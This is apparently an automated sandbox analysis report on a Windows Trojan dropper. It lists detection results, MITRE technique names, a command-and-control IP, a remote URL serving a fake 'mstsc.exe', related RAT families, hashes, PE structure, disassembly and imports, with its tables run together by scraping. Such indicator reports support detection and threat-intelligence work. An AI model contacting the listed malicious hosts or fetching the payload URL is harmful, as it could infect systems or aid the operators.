                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe53%ReversingLabsWin32.Trojan.Farfli
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://114.132.64.209/0%Avira URL Cloudsafe
                      http://114.132.64.209:9652/mstsc.exe0%Avira URL Cloudsafe
                      http://114.132.64.209:9652/mstsc.exeC:0%Avira URL Cloudsafe
                      119.91.152.151100%Avira URL Cloudmalware
                      http://114.132.64.209:9652/mstsc.exeTx0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bg.microsoft.map.fastly.net
                      199.232.210.172
                      truefalse
                        unknown
                        fp2e7a.wpc.phicdn.net
                        192.229.221.95
                        truefalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://114.132.64.209:9652/mstsc.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          119.91.152.151true
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://114.132.64.209/SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459663986.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://114.132.64.209:9652/mstsc.exeTxSecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459663986.000000000117E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://114.132.64.209:9652/mstsc.exeC:SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          119.91.152.151
                          unknownChina
                          24143CNNIC-QCN-APQingdaoCableTVNetworkCenterCNtrue
                          114.132.64.209
                          unknownChina
                          56046CMNET-JIANGSU-APChinaMobilecommunicationscorporationCNfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1520347
                          Start date and time:2024-09-27 08:33:11 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 15s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:4
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.winEXE@1/0@0/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 64%
                          • Number of executed functions: 47
                          • Number of non-executed functions: 266
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded IPs from analysis (whitelisted): 20.190.159.73, 20.190.159.23, 20.190.159.68, 20.190.159.4, 20.190.159.75, 20.190.159.0, 20.190.159.71, 20.190.159.64
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe
                          TimeTypeDescription
                          02:35:20API Interceptor284x Sleep call for process: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          119.91.152.151harst.exeGet hashmaliciousRunningRATBrowse
                            sIhckM7o37.exeGet hashmaliciousGh0stCringe RunningRATBrowse
                              114.132.64.209988.exeGet hashmaliciousGhostRat, NitolBrowse
                              • 114.132.64.209:9652/mstsc.exe
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              bg.microsoft.map.fastly.nethttp://breach-ads-notification.netlify.app/sample-appeal-id856193/Get hashmaliciousUnknownBrowse
                              • 199.232.210.172
                              http://www.dh91l.icu/Get hashmaliciousUnknownBrowse
                              • 199.232.210.172
                              http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                              • 199.232.214.172
                              http://steephan2003.github.io/Get hashmaliciousHTMLPhisherBrowse
                              • 199.232.210.172
                              http://ee-charge-recovery.web.app/Get hashmaliciousUnknownBrowse
                              • 199.232.210.172
                              http://dashing-brioche-5d3921.netlify.app/Get hashmaliciousHTMLPhisherBrowse
                              • 199.232.210.172
                              http://www.hongkong-post.frairza.com/Get hashmaliciousUnknownBrowse
                              • 199.232.214.172
                              https://imtokens.world/Get hashmaliciousUnknownBrowse
                              • 199.232.214.172
                              http://notrobotspark-1atre.web.app/Get hashmaliciousUnknownBrowse
                              • 199.232.210.172
                              https://satellite-doge1.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                              • 199.232.214.172
                              fp2e7a.wpc.phicdn.nethttp://breach-ads-notification.netlify.app/sample-appeal-id856193/Get hashmaliciousUnknownBrowse
                              • 192.229.221.95
                              http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                              • 192.229.221.95
                              https://tiktomallapp.top/Get hashmaliciousUnknownBrowse
                              • 192.229.221.95
                              https://business-helpcenter-case-review.d1qp3r75retmpg.amplifyapp.com/Get hashmaliciousUnknownBrowse
                              • 192.229.221.95
                              http://dashing-brioche-5d3921.netlify.app/Get hashmaliciousHTMLPhisherBrowse
                              • 192.229.221.95
                              http://www.hongkong-post.frairza.com/Get hashmaliciousUnknownBrowse
                              • 192.229.221.95
                              https://imtokens.world/Get hashmaliciousUnknownBrowse
                              • 192.229.221.95
                              http://notrobotspark-1atre.web.app/Get hashmaliciousUnknownBrowse
                              • 192.229.221.95
                              https://satellite-doge1.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                              • 192.229.221.95
                              http://fishing-lake-vip.pics/Get hashmaliciousUnknownBrowse
                              • 192.229.221.95
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CMNET-JIANGSU-APChinaMobilecommunicationscorporationCNhttp://aa5aa5aa5aa5aa44.app/Get hashmaliciousUnknownBrowse
                              • 223.109.148.140
                              http://c.vip3656jun27.cc/Get hashmaliciousUnknownBrowse
                              • 223.109.148.140
                              http://wwwhd4480.com/Get hashmaliciousUnknownBrowse
                              • 36.156.202.74
                              jade.arm.elfGet hashmaliciousMiraiBrowse
                              • 112.2.226.31
                              jade.m68k.elfGet hashmaliciousMiraiBrowse
                              • 112.22.243.77
                              jade.x86.elfGet hashmaliciousMiraiBrowse
                              • 112.22.243.83
                              XHrUkAemNj.elfGet hashmaliciousUnknownBrowse
                              • 114.9.233.129
                              http://764500.com/Get hashmaliciousUnknownBrowse
                              • 36.156.202.70
                              SecuriteInfo.com.Linux.Siggen.9999.11579.20419.elfGet hashmaliciousMiraiBrowse
                              • 223.105.211.59
                              https://www.gbt-inc.com/Get hashmaliciousUnknownBrowse
                              • 36.151.195.4
                              CNNIC-QCN-APQingdaoCableTVNetworkCenterCNj1zDB0umSZ.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                              • 119.91.222.215
                              arm7.elfGet hashmaliciousMiraiBrowse
                              • 119.91.25.4
                              x86.elfGet hashmaliciousUnknownBrowse
                              • 119.91.211.104
                              9ic0UJ4Eah.exeGet hashmaliciousUnknownBrowse
                              • 119.91.154.27
                              x86.elfGet hashmaliciousMiraiBrowse
                              • 220.112.52.250
                              networkxm.elfGet hashmaliciousUnknownBrowse
                              • 119.91.217.6
                              gO6RAJaFXe.elfGet hashmaliciousMiraiBrowse
                              • 115.174.91.155
                              harst.exeGet hashmaliciousRunningRATBrowse
                              • 119.91.152.151
                              dZcVvCQn9I.elfGet hashmaliciousMiraiBrowse
                              • 115.174.91.139
                              wFtZih4nN9.elfGet hashmaliciousMiraiBrowse
                              • 60.232.134.253
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.588383428087729
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 98.81%
                              • Windows ActiveX control (116523/4) 1.15%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe
                              File size:4'907'008 bytes
                              MD5:d46eb1527289a7937a29b51c5152c211
                              SHA1:ecc3d88cbcff257c989e1bc8bc0dee9f71a0d3fb
                              SHA256:c8f9d59dd94f5118e38f55a181a1c282080882b8b98338a46627de9884e8f784
                              SHA512:4feed2970d90e23c69934e0ff1e2e932f9533304956b8f5a0bf64f5166d912ff72757c3b8dc9b88def34142c52151e83dde06b96e8bb8a62a7455036c5a412b6
                              SSDEEP:98304:KvsgPxxP1vHXZ3/OsOP+DPkNln5KAh9qpdcFUvpi9P4H2OpuTIu:aXxP1vHXd/8WM9j5TI
                              TLSH:92367D04C641301BD9A939F42DEC22EA542C7BF43B2C25DB42497EFFAAB94F6243455B
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?...?...?.......?...>.}.?.......?.......?.....@.?.......?.......?.......?.Rich..?.........PE..L...'..f..................%
                              Icon Hash:71b018dccec77331
                              Entrypoint:0x610100
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66E2FE27 [Thu Sep 12 14:43:51 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:f9f6673de4e60c2d32659ee131b0b105
                              Instruction
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              call 00007F0050B7426Bh
                              call 00007F0050B5D706h
                              pop ebp
                              ret
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              push FFFFFFFEh
                              push 006BE128h
                              push 00612B80h
                              mov eax, dword ptr fs:[00000000h]
                              push eax
                              add esp, FFFFFF98h
                              push ebx
                              push esi
                              push edi
                              mov eax, dword ptr [0070D05Ch]
                              xor dword ptr [ebp-08h], eax
                              xor eax, ebp
                              push eax
                              lea eax, dword ptr [ebp-10h]
                              mov dword ptr fs:[00000000h], eax
                              mov dword ptr [ebp-18h], esp
                              mov dword ptr [ebp-70h], 00000000h
                              lea eax, dword ptr [ebp-60h]
                              push eax
                              call dword ptr [0065A284h]
                              cmp dword ptr [0071612Ch], 00000000h
                              jne 00007F0050B5D700h
                              push 00000000h
                              push 00000000h
                              push 00000001h
                              push 00000000h
                              call dword ptr [0065A288h]
                              call 00007F0050B5D883h
                              mov dword ptr [ebp-6Ch], eax
                              call 00007F0050B7519Bh
                              test eax, eax
                              jne 00007F0050B5D6FCh
                              push 0000001Ch
                              call 00007F0050B5D840h
                              add esp, 04h
                              call 00007F0050B6B9C8h
                              test eax, eax
                              jne 00007F0050B5D6FCh
                              push 00000010h
                              call 00007F0050B5D82Dh
                              add esp, 04h
                              push 00000001h
                              call 00007F0050B5FCD3h
                              add esp, 04h
                              call 00007F0050B7510Bh
                              mov dword ptr [ebp-04h], 00000000h
                              call 00007F0050B74CEFh
                              test eax, eax
                              Programming Language:
                              • [IMP] VS2008 SP1 build 30729
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [ C ] VS2010 build 30319
                              • [C++] VS2010 build 30319
                              • [RES] VS2010 build 30319
                              • [LNK] VS2010 build 30319
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2be98c0x168.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3170000x163b14.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x47b0000x265e8.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x29f0f80x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x25a0000x9c0.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x2581680x258200f481837e474589f9897afb6ce6f285ccunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x25a0000x67e500x6800018342cecc435c764b7512570e6524c28False0.26180795522836536data5.151934834210069IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x2c20000x541300x4c60088398bb3bcdd998f6067f900fcc70a07False0.3999686732815057Matlab v4 mat-file (little endian) \200, text, rows 8, columns 2, imaginary4.442666455941757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x3170000x163b140x163c00e3764edbd4781a0fdd167de4e32e9cadFalse0.3139164617006325data6.260233956071564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x47b0000x3d6e60x3d800974ec0f8f8ccd91c540962797dbf8b0cFalse0.29159124110772355data4.93116735033112IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_CURSOR0x3184080x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"ChineseChina0.4805194805194805
                              RT_CURSOR0x31853c0xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"ChineseChina0.7
                              RT_CURSOR0x3185f00x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.36363636363636365
                              RT_CURSOR0x3187240x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.35714285714285715
                              RT_CURSOR0x3188580x134dataChineseChina0.37337662337662336
                              RT_CURSOR0x31898c0x134dataChineseChina0.37662337662337664
                              RT_CURSOR0x318ac00x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                              RT_CURSOR0x318bf40x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.37662337662337664
                              RT_CURSOR0x318d280x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                              RT_CURSOR0x318e5c0x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.38636363636363635
                              RT_CURSOR0x318f900x134dataChineseChina0.44155844155844154
                              RT_CURSOR0x3190c40x134dataChineseChina0.4155844155844156
                              RT_CURSOR0x3191f80x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.5422077922077922
                              RT_CURSOR0x31932c0x134dataChineseChina0.2662337662337662
                              RT_CURSOR0x3194600x134dataChineseChina0.2824675324675325
                              RT_CURSOR0x3195940x134dataChineseChina0.3246753246753247
                              RT_BITMAP0x3196c80x155ae2Device independent bitmap graphic, 790 x 590 x 24, image size 0, resolution 11808 x 11808 px/mChineseChina0.39600086212158203
                              RT_BITMAP0x46f1ac0xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80ChineseChina0.44565217391304346
                              RT_BITMAP0x46f2640x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.37962962962962965
                              RT_ICON0x46f3a80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512ChineseChina0.33064516129032256
                              RT_ICON0x46f6900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128ChineseChina0.4391891891891892
                              RT_MENU0x46f7b80xfcdataChineseChina0.7420634920634921
                              RT_DIALOG0x46f8b40xe6dataChineseChina0.6695652173913044
                              RT_DIALOG0x46f99c0x62dataChineseChina0.7959183673469388
                              RT_DIALOG0x46fa000x190dataChineseChina0.6425
                              RT_DIALOG0x46fb900x18edataChineseChina0.6407035175879398
                              RT_DIALOG0x46fd200x190dataChineseChina0.63
                              RT_DIALOG0x46feb00x27cdataChineseChina0.5330188679245284
                              RT_DIALOG0x47012c0x384dataChineseChina0.4311111111111111
                              RT_DIALOG0x4704b00x27adataChineseChina0.5236593059936908
                              RT_DIALOG0x47072c0x244dataChineseChina0.5448275862068965
                              RT_DIALOG0x4709700x19edataChineseChina0.5531400966183575
                              RT_DIALOG0x470b100x1d2dataChineseChina0.6373390557939914
                              RT_DIALOG0x470ce40x1d8dataChineseChina0.6271186440677966
                              RT_DIALOG0x470ebc0x25cdataChineseChina0.5529801324503312
                              RT_DIALOG0x4711180x1d4dataChineseChina0.6388888888888888
                              RT_DIALOG0x4712ec0x6ecdataChineseChina0.40632054176072235
                              RT_DIALOG0x4719d80x194dataChineseChina0.6534653465346535
                              RT_DIALOG0x471b6c0x2b6dataChineseChina0.5014409221902018
                              RT_DIALOG0x471e240x21cdataChineseChina0.5259259259259259
                              RT_DIALOG0x4720400x190dataChineseChina0.655
                              RT_DIALOG0x4721d00xeadataChineseChina0.6794871794871795
                              RT_DIALOG0x4722bc0xeadataChineseChina0.6923076923076923
                              RT_DIALOG0x4723a80x178dataChineseChina0.651595744680851
                              RT_DIALOG0x4725200x17adataChineseChina0.5211640211640212
                              RT_DIALOG0x47269c0x1ccdataChineseChina0.5630434782608695
                              RT_DIALOG0x4728680x18cdataChineseChina0.6136363636363636
                              RT_DIALOG0x4729f40xe2dataChineseChina0.6769911504424779
                              RT_DIALOG0x472ad80x34dataChineseChina0.8653846153846154
                              RT_STRING0x472b0c0x4adataChineseChina0.7027027027027027
                              RT_STRING0x472b580x4edataChineseChina0.8461538461538461
                              RT_STRING0x472ba80x2cdataChineseChina0.5909090909090909
                              RT_STRING0x472bd40x84dataChineseChina0.9166666666666666
                              RT_STRING0x472c580x1c4dataChineseChina0.8053097345132744
                              RT_STRING0x472e1c0x14edataChineseChina0.5179640718562875
                              RT_STRING0x472f6c0x10edataChineseChina0.7037037037037037
                              RT_STRING0x47307c0x50dataChineseChina0.7125
                              RT_STRING0x4730cc0x44dataChineseChina0.6764705882352942
                              RT_STRING0x4731100x68dataChineseChina0.7019230769230769
                              RT_STRING0x4731780x1b2dataChineseChina0.6474654377880185
                              RT_STRING0x47332c0xf4dataChineseChina0.6065573770491803
                              RT_STRING0x4734200x24dataChineseChina0.4722222222222222
                              RT_STRING0x4734440x1a6dataChineseChina0.6658767772511849
                              RT_GROUP_CURSOR0x4735ec0x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina1.0294117647058822
                              RT_GROUP_CURSOR0x4736100x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x4736240x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x4736380x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x47364c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x4736600x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x4736740x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x4736880x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x47369c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x4736b00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x4736c40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x4736d80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x4736ec0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x4737000x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x4737140x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_ICON0x4737280x22dataChineseChina1.0
                              RT_VERSION0x47374c0x300dataChineseChina0.4791666666666667
                              RT_MANIFEST0x473a4c0x25fASCII text, with very long lines (607), with no line terminatorsEnglishUnited States0.43492586490939045
                              None0x473cac0x420dataChineseChina0.4384469696969697
                              None0x4740cc0x424dataChineseChina0.44056603773584907
                              None0x4744f00x424dataChineseChina0.4377358490566038
                              None0x4749140x91fSysEx File - OctavePlateauChineseChina0.30449678800856533
                              None0x4752340x858dataChineseChina0.24906367041198502
                              None0x475a8c0x927dataChineseChina0.30815194195475887
                              None0x4763b40x436dataChineseChina0.44155844155844154
                              None0x4767ec0x32dataChineseChina0.86
                              None0x4768200x4dfdataChineseChina0.41780272654370487
                              None0x476d000x4dbdataChineseChina0.41834271922767496
                              None0x4771dc0x420dataChineseChina0.4422348484848485
                              None0x4775fc0x4e9dataChineseChina0.4144789180588703
                              None0x477ae80xd2bdataChineseChina0.22396914862058737
                              None0x4788140x4dfdataChineseChina0.4153969526864475
                              None0x478cf40x8ffdataChineseChina0.30481980026052974
                              None0x4795f40x4dbdataChineseChina0.41190667739340303
                              None0x479ad00x26dataChineseChina1.1842105263157894
                              None0x479af80x3f2dataChineseChina0.4306930693069307
                              None0x479eec0x624dataChineseChina0.3975826972010178
                              None0x47a5100x602dataChineseChina0.39011703511053314
                              DLLImport
                              KERNEL32.dllFileTimeToLocalFileTime, UnmapViewOfFile, MapViewOfFile, CreateFileMappingA, SetEnvironmentVariableA, CreateFileW, GetTimeZoneInformation, GetConsoleMode, GetConsoleCP, CompareStringW, LCMapStringW, GetStringTypeW, HeapQueryInformation, HeapSize, HeapReAlloc, HeapCreate, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, QueryPerformanceCounter, IsValidCodePage, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, SetStdHandle, OutputDebugStringW, GetFileType, WriteConsoleW, OutputDebugStringA, GetStdHandle, GetSystemTimeAsFileTime, ExitThread, CreateThread, ExitProcess, VirtualQuery, GetSystemInfo, RaiseException, HeapValidate, GetStartupInfoW, HeapSetInformation, GetCommandLineA, DecodePointer, EncodePointer, RtlUnwind, InitializeCriticalSectionAndSpinCount, Sleep, SearchPathA, GetTempPathA, GetFileAttributesExA, GetFileSizeEx, GetTempFileNameA, GetFileTime, GetFileAttributesA, GetTickCount, FindResourceExW, GetNumberFormatA, GetWindowsDirectoryA, lstrcmpiA, GetFullPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, OpenEventA, WriteFile, ReadFile, CreateFileA, GetCurrentProcess, DuplicateHandle, GetHandleInformation, lstrcpyA, DeleteFileA, GetCurrentDirectoryA, GetProfileIntA, GetACP, GetOEMCP, GetCPInfo, GlobalFlags, TlsGetValue, LocalReAlloc, TlsSetValue, EnterCriticalSection, GlobalReAlloc, LeaveCriticalSection, TlsFree, GlobalHandle, DeleteCriticalSection, TlsAlloc, InitializeCriticalSection, LocalAlloc, ReleaseActCtx, CreateActCtxW, GetModuleFileNameW, GetAtomNameA, SetErrorMode, FileTimeToSystemTime, WritePrivateProfileStringA, GetPrivateProfileStringA, GetPrivateProfileIntA, SetEvent, WaitForSingleObject, CloseHandle, InterlockedExchange, GetModuleHandleW, lstrcmpA, GetCurrentThread, GetLocaleInfoA, GetUserDefaultUILanguage, ConvertDefaultLocale, GetSystemDefaultUILanguage, ResumeThread, SetThreadPriority, CompareStringA, LoadLibraryW, GetVersionExA, FindResourceA, FreeResource, lstrcmpW, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, ActivateActCtx, DeactivateActCtx, GetCurrentProcessId, GetModuleFileNameA, GetModuleHandleA, MulDiv, GlobalFree, lstrlenW, CopyFileA, GlobalSize, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, WideCharToMultiByte, FindResourceW, LoadResource, LockResource, SizeofResource, MultiByteToWideChar, GetLastError, InterlockedDecrement, LocalFree, InterlockedIncrement, HeapAlloc, GetThreadLocale, lstrlenA, GetProcessHeap, HeapFree, FreeLibrary, GetProcAddress, LoadLibraryA, IsBadReadPtr, SetLastError, VirtualFree, VirtualProtect, SetFilePointer, VirtualAlloc
                              USER32.dllDrawTextExA, DrawTextA, DrawFocusRect, DrawFrameControl, DrawEdge, DrawStateA, DrawIcon, InvertRect, FrameRect, FillRect, GetSysColorBrush, SetCursor, GetCursorPos, GetMessageA, TranslateMessage, PostQuitMessage, EndDialog, CreateDialogIndirectParamA, CharNextA, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, CheckDlgButton, LoadCursorW, LoadCursorA, PostThreadMessageA, NotifyWinEvent, SetWindowContextHelpId, GetForegroundWindow, SetForegroundWindow, HideCaret, OpenClipboard, WindowFromPoint, SetParent, ShowScrollBar, GetNextDlgTabItem, GetNextDlgGroupItem, GetDesktopWindow, SetCapture, GetActiveWindow, KillTimer, SetTimer, EnableScrollBar, RedrawWindow, LockWindowUpdate, ShowOwnedPopups, IsWindowVisible, ValidateRect, InvalidateRgn, InvalidateRect, GetUpdateRect, UpdateWindow, ReleaseDC, GetWindowDC, GetDC, EndPaint, GrayStringA, ClientToScreen, BringWindowToTop, GetWindowRgn, SetWindowRgn, IsZoomed, DestroyMenu, GetSystemMenu, DrawMenuBar, GetMenuCheckMarkDimensions, LoadBitmapW, SetMenuItemBitmaps, TabbedTextOutA, PostMessageA, MapDialogRect, RegisterWindowMessageA, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, LoadIconW, LoadIconA, SendDlgItemMessageA, MonitorFromWindow, GetMonitorInfoA, GetClientRect, MapWindowPoints, GetSysColor, PeekMessageA, DispatchMessageA, GetFocus, SetActiveWindow, SetFocus, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, BeginDeferWindowPos, CopyRect, EndDeferWindowPos, ScrollWindow, GetWindowRect, GetScrollInfo, SetScrollInfo, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, GetTopWindow, IsChild, GetWindow, GetCapture, WinHelpA, TrackPopupMenu, 